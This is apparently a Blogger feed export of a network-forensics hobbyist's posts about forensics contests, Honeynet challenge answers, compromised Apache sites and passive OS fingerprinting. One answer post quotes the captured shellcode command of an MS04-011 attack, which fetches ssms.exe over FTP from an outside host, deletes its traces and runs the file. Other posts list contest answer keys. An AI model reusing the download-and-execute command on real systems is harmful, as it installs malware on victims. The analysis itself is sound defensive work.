Results'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-1066013188678422942</id><published>2010-02-04T10:20:00.002-07:00</published><updated>2010-02-04T10:26:13.744-07:00</updated><title type='text'>Forensic Contest #4 released</title><content type='html'>More information at their site, but here is what they are asking you to find.&lt;br /&gt;&lt;br /&gt;1. What was the IP address of Mr. X’s scanner?&lt;br /&gt;2. What type of port scan(s) did Mr. X conduct? Check all that apply:&lt;br /&gt;&lt;br /&gt;    * TCP SYN&lt;br /&gt;    * TCP ACK&lt;br /&gt;    * UDP&lt;br /&gt;    * TCP Connect&lt;br /&gt;    * TCP XMAS&lt;br /&gt;    * TCP RST&lt;br /&gt;&lt;br /&gt;3. What were the IP addresses of the targets Mr. X discovered?&lt;br /&gt;4. What was the MAC address of the Apple system he found?&lt;br /&gt;5. What was the IP address of the Windows system he found?&lt;br /&gt;6. What TCP ports were open on the Windows system? (Please list the decimal numbers from lowest to highest.)&lt;br /&gt;X-TRA CREDIT (You don’t have to answer this, but you get super bonus points if you do): What was the name of the tool Mr. X used to port scan? How can you tell? Can you reconstruct the output from the tool, roughly the way Mr. 
X would have seen it?&lt;br /&gt;&lt;br /&gt;Deadline is 3/04/10 (11:59:59PM UTC-11) (In other words, if it’s still 3/04/10 anywhere in the world, you can submit your entry.)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-1066013188678422942?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://forensicscontest.com/2010/02/03/puzzle-4-the-curious-mr-x' title='Forensic Contest #4 released'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/1066013188678422942/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=1066013188678422942' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1066013188678422942'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1066013188678422942'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/02/forensic-contest-4-released.html' title='Forensic Contest #4 released'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-2476079669781829306</id><published>2010-02-02T11:21:00.002-07:00</published><updated>2010-02-02T11:23:30.310-07:00</updated><title type='text'>Forensics Contest #3 - Answers</title><content type='html'>Ok, not going to do a writeup on this one.  NetworkMiner was able to pull all the info out without much work.  
Thankfully it puts tcp packets back together and reconstructs the .xml files in question.  Hopefully someone out there was able to come up with a new script to pull all the info they wanted, but it wasn't me, that is for sure!&lt;br /&gt;&lt;br /&gt;My answers were:&lt;br /&gt;1.  002500FE07C4&lt;br /&gt;2.  AppleTV/2.4&lt;br /&gt;3.  h, ha, hac, hack&lt;br /&gt;4.  Hackers&lt;br /&gt;5.  http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v&lt;br /&gt;6.  Sneakers&lt;br /&gt;7.  $9.99&lt;br /&gt;8.  iknowyourewatchingme&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-2476079669781829306?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/2476079669781829306/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=2476079669781829306' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2476079669781829306'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/2476079669781829306'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/02/forensics-contest-3-answers.html' title='Forensics Contest #3 - Answers'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6437025648253642358</id><published>2010-02-02T11:15:00.003-07:00</published><updated>2010-02-02T11:19:05.528-07:00</updated><title type='text'>Honeynet Challenge #1 - Answers</title><content type='html'>The deadline was yesterday, so I think I'm OK posting my answers.  Not sure if these are correct or not, but this is what I submitted.  If anyone has any questions let me know.  Again, this was a fun exercise:&lt;br /&gt;&lt;br /&gt;Question 1. Which systems (i.e. IP addresses) are involved?  &lt;br /&gt;&lt;br /&gt;Tools Used:  Satori, NetworkMiner, and Wireshark  &lt;br /&gt;192.150.11.111 – End system&lt;br /&gt;98.114.205.102 - Attacker&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 2. What can you find out about the attacking host (e.g., where is it located)?   &lt;br /&gt;&lt;br /&gt;Tools Used:  WHOIS, Wireshark  &lt;br /&gt;&lt;br /&gt;TTL – 113; since it appears to be a Windows box (default initial TTL 128), that puts it 15 hops away.&lt;br /&gt;&lt;br /&gt;According to:  http://www.ipaddresslocation.org/ip-address-locator.php&lt;br /&gt;&lt;br /&gt;They are most likely located in/around Southampton, Pennsylvania, which is where the local Verizon Internet Services office is located, at least.&lt;br /&gt;&lt;br /&gt;The attacking system appears to be a Windows 2000 system (TTL puts it as Windows (typically), the TCP fingerprint puts it as a Windows 2000, XP or 2003 box, and SMB puts it as Windows 2000; SMB is normally the most reliable of those mentioned).&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 3. How many TCP sessions are contained in the dump file?   &lt;br /&gt;&lt;br /&gt;Tools Used:  NetworkMiner, verified with Wireshark  &lt;br /&gt;&lt;br /&gt;5 total:&lt;br /&gt;- 4 from 98.114.205.102&lt;br /&gt;- 1 from 192.150.11.111    &lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 4. 
How long did it take to perform the attack?  &lt;br /&gt;&lt;br /&gt;Tools Used:  Wireshark&lt;br /&gt;&lt;br /&gt;It depends on what part you consider the actual attack:&lt;br /&gt;&lt;br /&gt;Max of 16.2 seconds from the first packet to the last packet in the capture.  Most of the time is actually spent FTP’ing a file. &lt;br /&gt;&lt;br /&gt;Within the first 2 seconds the buffer overflow has already taken place. The next 14 seconds are spent sending the command to the system and FTP’ing the file.&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?  &lt;br /&gt;&lt;br /&gt;Tools Used:  Satori, Wireshark &lt;br /&gt;&lt;br /&gt;192.150.11.111&lt;br /&gt;&lt;br /&gt;2 competing fingerprints: &lt;br /&gt;&lt;br /&gt;    * Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel. &lt;br /&gt;    * SMB packets on the other hand claim it is on the VIDCAM domain and running Windows 5.1 (packets 16 &amp; 19)&lt;br /&gt;&lt;br /&gt;Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; trying to exploit MS04-011, targeting the Windows LSA Service.  &lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 6. Can you sketch an overview of the general actions performed by the attacker?   &lt;br /&gt;&lt;br /&gt;Tools Used:  Wireshark&lt;br /&gt;&lt;br /&gt;Authenticates as a null user to IPC$, performs a DsRoleUpgradeDownlevelServer buffer overflow.   Once exploited, it forces the system to FTP a file. 
&lt;br /&gt;&lt;br /&gt;First they dump these commands in the file ‘o’:&lt;br /&gt;&lt;br /&gt;open 0.0.0.0 8884&lt;br /&gt;&lt;br /&gt;user 1 1&lt;br /&gt;&lt;br /&gt;get ssms.exe &lt;br /&gt;&lt;br /&gt;Then they do:&lt;br /&gt;&lt;br /&gt;ftp -n -s:o   (Suppresses auto-login and reads commands in from the ‘o’ file) &lt;br /&gt;&lt;br /&gt;Delete the ‘o’ file to make sure nobody can see what they did, forcing quiet mode (/Q) and deletion of read-only files (/F), just in case. &lt;br /&gt;&lt;br /&gt;Then launch ssms.exe &lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 7. What specific vulnerability was attacked?   &lt;br /&gt;&lt;br /&gt;MS04-011, good writeup at:&lt;br /&gt;&lt;br /&gt;http://research.eeye.com/html/advisories/published/AD20040413C.html &lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 8. What actions does the shellcode perform? Pls list the shellcode   &lt;br /&gt;&lt;br /&gt;Tools Used: Wireshark, follow TCP conversation&lt;br /&gt;&lt;br /&gt;It targets DsRoleUpgradeDownlevelServer, does a buffer overflow with a lot of 0x31, or 1’s in ASCII.  As soon as that is done it starts a new TCP conversation and does this (more info back in question #6) &lt;br /&gt;&lt;br /&gt;echo open 0.0.0.0 8884 &gt; o&amp;echo user 1 1 &gt;&gt; o &amp;echo get ssms.exe &gt;&gt; o &amp;echo quit &gt;&gt; o &amp;ftp -n -s:o &amp;del /F /Q o &amp;ssms.exe&lt;br /&gt;&lt;br /&gt;ssms.exe &lt;br /&gt;&lt;br /&gt;It appears to call ssms.exe twice, not sure if that is by design or due to a bug???&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?  &lt;br /&gt;&lt;br /&gt;Tools Used:  Satori (http://myweb.cableone.net/xnih)  &lt;br /&gt;&lt;br /&gt;Yes.  Go back to #5.  TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP.    
The TTL can be tweaked on Windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.&lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 10. Was there malware involved? What's the name of the malware? (We are not looking for a detailed malware analysis for this challenge)  &lt;br /&gt;&lt;br /&gt;Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say.  That is just a guess based on the name and the name alone.  &lt;br /&gt;&lt;br /&gt;-----&lt;br /&gt;&lt;br /&gt;Question 11. Do you think this is a manual or an automated attack? Why?   &lt;br /&gt;&lt;br /&gt;Automated, it only took 16 seconds from start to finish.  Typing this sentence up took that long with a few typos!  Not to mention, most of that 16.2 seconds was downloading the ssms.exe file.  So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-6437025648253642358?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6437025648253642358/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6437025648253642358' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6437025648253642358'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6437025648253642358'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/02/honeynet-challenge-1-answers.html' title='Honeynet Challenge #1 - 
Answers'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-42600468024202884</id><published>2010-01-25T10:12:00.004-07:00</published><updated>2010-01-25T10:16:09.359-07:00</updated><title type='text'>Honeynet - Challenge 1 of the Forensic Challenge 2010</title><content type='html'>Ok, I posted this a week or so ago to the NetworkMiner beta list, but forgot to put anything up on here about it.  This was a fun exercise, different than the other ones I've done and posted about recently.&lt;br /&gt;&lt;br /&gt;It was short notice when I put it on that list, even shorter here, but...&lt;br /&gt;&lt;br /&gt;In this case, no need to write code, just find the answers and tell them what program(s) you used.&lt;br /&gt;&lt;br /&gt;----&lt;br /&gt;&lt;br /&gt;&lt;a href="https://honeynet.org/node/504"&gt;The Challenge&lt;/a&gt;:&lt;br /&gt;A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:&lt;br /&gt;&lt;br /&gt;   1. Which systems (i.e. IP addresses) are involved? (2pts)&lt;br /&gt;   2. What can you find out about the attacking host (e.g., where is it located)? (2pts)&lt;br /&gt;   3. How many TCP sessions are contained in the dump file? (2pts)&lt;br /&gt;   4. How long did it take to perform the attack? (2pts)&lt;br /&gt;   5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)&lt;br /&gt;   6. Can you sketch an overview of the general actions performed by the attacker? (6pts)&lt;br /&gt;   7. What specific vulnerability was attacked? (2pts)&lt;br /&gt;   8. What actions does the shellcode perform? 
Pls list the shellcode. (8pts)&lt;br /&gt;   9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)&lt;br /&gt;  10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)&lt;br /&gt;  11. Do you think this is a manual or an automated attack? Why? (2pts)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-42600468024202884?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='https://honeynet.org/node/504' title='Honeynet - Challenge 1 of the Forensic Challenge 2010'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/42600468024202884/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=42600468024202884' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/42600468024202884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/42600468024202884'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/01/honeynet-challenge-1-of-forensic.html' title='Honeynet - Challenge 1 of the Forensic Challenge 2010'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-422480068428093534</id><published>2010-01-24T22:02:00.003-07:00</published><updated>2010-01-24T22:26:16.810-07:00</updated><title type='text'>Infected sites and 
Google Alerts</title><content type='html'>Not as much on OS fingerprinting, but due to alerts I have set up in Google Alerts on fingerprinting I've been getting a look at a couple hundred sites that have been taken over in some form or another since just before Christmas.  I'm getting Google to notify me of compromised sites and I don't want it anymore, I want to go back to useful alerts for new info on fingerprinting out there!&lt;br /&gt;&lt;br /&gt;Sites end up being:&lt;br /&gt;http://somewhere.wherever/5-6 character junk/&lt;br /&gt;&lt;br /&gt;The first 2 I saw I actually dropped notes to those compromised and was happy to see them clean them up; whether they patched I have no idea, but cleaned up.&lt;br /&gt;&lt;br /&gt;Everything was Apache from what I could tell doing banner grabbing with Satori.  It wasn't something I was too worried about, but .....&lt;br /&gt;&lt;br /&gt;Could be an Apache hole, OpenSSL, PHP, etc.  Hard to say.&lt;br /&gt;&lt;br /&gt;Looking at one that has been compromised since Christmas the following layout is there:&lt;br /&gt;1g&lt;br /&gt;1r.txt&lt;br /&gt;1t&lt;br /&gt;2.js&lt;br /&gt;2r.txt&lt;br /&gt;academia.php&lt;br /&gt;accenture.php&lt;br /&gt;....&lt;br /&gt;fingeprinting.php&lt;br /&gt;...&lt;br /&gt;passive.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1g -&lt;br /&gt;file seems to list a ton of other sites, possibly ones compromised or possibly ones to dump you off to.  I played around a bit with it back at Christmas, assumed the problem would go away and forgot about it for the most part.  
But since it is a month later and I'm still getting new ones each day I figured I'd at least post something on it.&lt;br /&gt;&lt;br /&gt;1t - &lt;br /&gt;possibly usernames it is trying&lt;br /&gt;&lt;br /&gt;2r -&lt;br /&gt;php files it is going to create&lt;br /&gt;&lt;br /&gt;Simple search to find pages with Google to get an idea:&lt;br /&gt;"fingerprinting the dead with rigor morits"&lt;br /&gt;&lt;br /&gt;Based on file times I assume there is some type of automated scan they are doing and dumping their first .php file on it.  Then someone is going through those lists 12-24 hours later and uploading the rest.  Just looking at timestamps on the files there is typically one file created on day 0, then all the others get created the next day, but not all at the same time, one here, one there.&lt;br /&gt;&lt;br /&gt;Anyway, if anyone is going to go poking around, make sure you just go to the subdir (directory listing is turned on in all the ones I looked at); e.g. instead of:&lt;br /&gt;http://xxxxxxxx.com/z1jyed/fingerprinting.php&lt;br /&gt;only go to:&lt;br /&gt;http://xxxxxxxx.com/z1jyed/&lt;br /&gt;&lt;br /&gt;Oh yeah, I was going to go poke around on some of my Apache boxes and make sure they weren't compromised.  
Maybe tomorrow.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-422480068428093534?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/422480068428093534/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=422480068428093534' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/422480068428093534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/422480068428093534'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/01/infected-sites-and-google-alerts.html' title='Infected sites and Google Alerts'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3354702525771337302</id><published>2010-01-04T16:06:00.002-07:00</published><updated>2010-01-04T16:12:31.582-07:00</updated><title type='text'>Passive Fingerprinting of Network Reconnaissance Tools</title><content type='html'>Last month I ran across the initial 3 page IEEE &lt;a href="http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&amp;arnumber=5353474&amp;isnumber=5353445&amp;tag=1"&gt;summary&lt;/a&gt; of this thesis paper.  At the time I wasn't able to find a full copy of it.  
Though now it looks like there is a copy out there on dtic.mil&lt;br /&gt;&lt;br /&gt;In a nutshell they look at the visual fingerprint a scanner, such as NMAP, UnicornScan, etc., makes as it scans a system.  By utilizing the information they obtain they can tell what program is scanning your system.&lt;br /&gt;&lt;br /&gt;Anyway, interesting twist, fingerprinting the application scanning you.  I had looked at doing this with some products, but never to this extent, very nicely done!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3354702525771337302?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.dtic.mil/cgi-bin/GetTRDoc?AD=ADA509167&amp;Location=U2&amp;doc=GetTRDoc.pdf' title='Passive Fingerprinting of Network Reconnaissance Tools'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3354702525771337302/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3354702525771337302' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3354702525771337302'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3354702525771337302'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/01/passive-fingerprinting-of-network.html' title='Passive Fingerprinting of Network Reconnaissance Tools'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-1059271239014999603</id><published>2009-12-28T09:12:00.002-07:00</published><updated>2009-12-28T09:15:43.076-07:00</updated><title type='text'>Forensics Contest #3 released</title><content type='html'>For the holidays they released challenge #3.  This time you'll need to reassemble packets to get the whole picture!  May be beyond what I can throw together in Perl, actually 99% sure it is since I tried to do this a little last time.  I'll probably write something in C or Pascal for it.  Problem with doing it in Pascal is they are going to want the source and I'm not sure I'm willing to give up my source on WinPcap stuff.  We'll see, maybe use something else to rip the traffic out and then just put a nice GUI front end on it with Pascal.  Who knows.&lt;br /&gt;&lt;br /&gt;Anyway, check it out.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-1059271239014999603?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://forensicscontest.com/' title='Forensics Contest #3 released'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/1059271239014999603/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=1059271239014999603' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1059271239014999603'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1059271239014999603'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/12/forensics-contest-3-released.html' 
title='Forensics Contest #3 released'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4387891505546758833</id><published>2009-12-17T22:10:00.005-07:00</published><updated>2009-12-18T07:30:24.849-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forensics contest'/><title type='text'>Forensics Contest #2 Finalists and Winners</title><content type='html'>Based on the PaulDotCom 180 podcast Franck and Jeremy were the winners, they decided to have co-winners this time around.  Erik and NetworkMiner ended up being finalists again and got special mention in the podcast.&lt;br /&gt;&lt;br /&gt;As of this posting they haven't actually published this at the forensicscontest site, but I guessed at the &lt;a href="http://forensicscontest.com/contest02/Finalists/"&gt;URL&lt;/a&gt; and picked up the Finalists along with the winners from the podcast.&lt;br /&gt;&lt;br /&gt;Will be fun to look through the winners submissions over the next few days/weeks.  Contest #3 is hopefully due out in the next 7-14 days.&lt;br /&gt;&lt;br /&gt;Update:&lt;br /&gt;Posted:&lt;br /&gt;Contest Winners and writeup now &lt;a href="http://forensicscontest.com/2009/12/18/puzzle-2-winners-and-solutions"&gt;posted&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I made the SemiFinalist list (top 15), just didn't make the finalist list (top 8).  
Maybe Contest #3!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-4387891505546758833?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://forensicscontest.com/contest02/Finalists/' title='Forensics Contest #2 Finalists and Winners'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4387891505546758833/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4387891505546758833' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4387891505546758833'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4387891505546758833'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/12/forensics-contest-2-finalists-and.html' title='Forensics Contest #2 Finalists and Winners'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-3507973652056015579</id><published>2009-12-13T20:40:00.003-07:00</published><updated>2009-12-13T20:47:02.785-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='dfrws'/><title type='text'>DFRWS results posted</title><content type='html'>At the time the 2009 challenge was posted I think I only looked at the network traffic side of things and didn't get a lot out of it.  
Not sure if I'd done the GCFA and SANS 508 course at that time or not, but I know I didn't dig into the memory or disk dumps.  It would have been nice to dig in, knowing a bit more about that stuff now.  Anyway, glanced through a few of the writeups, very nice work!&lt;br /&gt;&lt;br /&gt;You can find the writeups, challenge info, etc. &lt;a href="http://www.dfrws.org/2009/challenge/index.shtml"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I think NetworkMiner will make much better use of the pcap files than Satori does, but Satori isn't designed for this type of thing anyway!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5343200444918965958-3507973652056015579?l=chatteronthewire.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.dfrws.org/index.shtml' title='DFRWS results posted'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/3507973652056015579/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=3507973652056015579' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3507973652056015579'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/3507973652056015579'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2009/12/dfrws-results-posted.html' title='DFRWS results posted'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-879058494029449988</id><published>2009-11-23T14:06:00.005-07:00</published><updated>2009-11-28T15:08:45.391-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='network forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='forensics contest'/><title type='text'>Network Forensic Challenge #2 - update</title><content type='html'>Ok, the submission date got extended an extra week, which ended yesterday.  Erik put out version 0.90 of NetworkMiner in which he added support to pull out SMTP messages from captured data.  He found a bug in 0.90 and released 0.91 yesterday, it can be found &lt;a href="http://sourceforge.net/projects/networkminer/files/latest"&gt;here&lt;/a&gt;.  &lt;br /&gt;&lt;br /&gt;My answers are here:&lt;br /&gt;1.  Username:sneakyg33k@aol.com&lt;br /&gt;2.  Password:558r00lz&lt;br /&gt;3.  mistersecretx@aol.com&lt;br /&gt;4.  fake passport and a bathing suit.&lt;br /&gt;5.  secretrendezvous.docx&lt;br /&gt;6.  9E423E11DB88F01BBFF81172839E1923&lt;br /&gt;7.  Playa del Carmen, Mexico&lt;br /&gt;8.  AADEACE50997B1BA24B09AC2EF1940B7&lt;br /&gt;&lt;br /&gt;I used the pcapcat perl script from NFC #1 to extract the initial data.  The one thing I think is a bit unrealistic in these contests is the packet captures are too small, there isn't 100-500 MB of stuff to sift through, trying to decide what is needed/not.  Due to download feeds and whatnot I understand why that is, but....  Feeding a 100 kb pcap file through makes life quite simple.  Anyway, I emailed the author of pcapcat, for what we've seen in #1 and #2 that script works fine, but if any packets are resent, or out of order, pcapcat fails to take that into account and just puts the data in the output file in the order it was seen in the pcap file.  
I tried to make some changes to it to fix that, but it was beyond what I could figure out in a short enough time period.  Sent my thoughts on to him and we'll see if it gets updated in a future release.  We could have used tcpflow, Wireshark, etc. to get the initial conversation dumped out.&lt;br /&gt;&lt;br /&gt;Anyway, however you get the raw data is up to you; dump it to a file and then, as I did, feed it through &lt;a href="http://myweb.cableone.net/xnih/download/smtpcat.pl"&gt;smtpcat.pl&lt;/a&gt; which will parse it into whatever attachments it may have, pull the username/password out and decode them.  You'll still need to do an MD5Sum on the extracted file.  My script was completely hacked together, no subs, just start to finish run and output.  Not pretty, but functional!&lt;br /&gt;&lt;br /&gt;Open up the extracted file and you'll see the location they are meeting at, and because .docx files are just zipped up files you can do an unzip on the .docx file, browse around, find the image file and do an MD5Sum on it also.&lt;br /&gt;&lt;br /&gt;I'm being a bit vague on this one because it has been well over a month since I did most of this, and I don't 